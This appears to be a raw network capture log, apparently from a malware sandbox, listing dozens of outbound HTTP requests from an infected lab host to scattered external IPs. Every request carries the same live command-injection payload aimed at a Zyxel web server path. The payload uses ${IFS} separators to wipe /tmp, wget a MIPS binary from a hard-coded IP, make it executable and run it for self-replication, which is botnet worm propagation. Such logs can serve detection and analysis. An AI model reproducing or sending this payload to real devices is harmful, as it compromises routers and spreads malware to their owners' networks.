                                        Jan 14, 2024 16:18:56.730252028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7375192.168.2.135946085.163.233.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730318069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7376192.168.2.1342550159.37.243.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730371952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7377192.168.2.133608652.46.136.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730434895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7378192.168.2.1345298148.173.72.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730452061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7379192.168.2.133602871.43.80.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730515003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7380192.168.2.1348210111.109.227.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730561972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7381192.168.2.1359738216.36.255.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730649948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7382192.168.2.135053252.47.17.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730653048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7383192.168.2.135462817.7.235.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730706930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7384192.168.2.134538471.24.134.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730756044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7385192.168.2.134727851.66.3.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730807066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7386192.168.2.1358964207.184.89.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730865955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7387192.168.2.1359246172.201.174.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730931044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7388192.168.2.135693413.139.95.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.730979919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7389192.168.2.1344238155.239.0.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731025934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7390192.168.2.133897462.102.117.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731106043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7391192.168.2.133702892.104.155.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731149912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7392192.168.2.1339424107.64.5.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731199026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7393192.168.2.1347758110.109.193.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731260061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7394192.168.2.1333664218.172.171.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731311083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7395192.168.2.1348696141.86.104.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731379032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7396192.168.2.1354810152.253.135.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731441975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7397192.168.2.1353324134.10.34.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731479883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7398192.168.2.135187871.61.104.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731527090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7399192.168.2.1357432219.70.172.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731611013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7400192.168.2.135407477.182.243.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731668949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7401192.168.2.135102017.167.108.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731728077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7402192.168.2.134427031.190.93.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731811047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7403192.168.2.134563844.43.55.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731858015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7404192.168.2.13471808.235.99.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731914997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7405192.168.2.135186089.54.228.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.731977940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7406192.168.2.1347686128.155.153.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732024908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7407192.168.2.1353512189.30.215.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732100010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7408192.168.2.1350970172.210.111.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732153893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7409192.168.2.136042059.175.106.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732202053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7410192.168.2.135317084.134.173.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732251883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7411192.168.2.13347922.151.232.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732335091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7412192.168.2.1335360135.129.126.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732382059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7413192.168.2.133984642.118.54.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732439995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7414192.168.2.1350612164.100.71.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732482910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7415192.168.2.1356922202.66.157.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732548952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7416192.168.2.1353494147.110.242.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732589960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7417192.168.2.1350686163.249.95.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732640028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7418192.168.2.1360892170.197.148.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732702971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7419192.168.2.135662299.238.74.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732767105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7420192.168.2.1351770114.73.191.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732805967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7421192.168.2.1358832109.153.32.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732886076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7422192.168.2.133798874.40.75.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732942104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7423192.168.2.1344036160.7.241.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.732999086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7424192.168.2.135358457.99.222.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733041048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7425192.168.2.1353170223.170.215.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733131886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7426192.168.2.135728097.48.219.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733155966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7427192.168.2.1342196207.246.219.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733208895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7428192.168.2.134086285.176.45.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733254910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7429192.168.2.1345490176.105.113.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733287096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7430192.168.2.136018248.5.9.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733341932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7431192.168.2.134352635.157.17.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733412027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7432192.168.2.135129087.222.211.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733496904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7433192.168.2.1353644171.97.89.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733536005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7434192.168.2.1343280145.100.98.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733598948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7435192.168.2.1338524187.188.111.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733659983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7436192.168.2.135055025.56.224.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.733700991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7437192.168.2.13416981.61.2.42443
                                        TimestampBytes transferredDirectionData
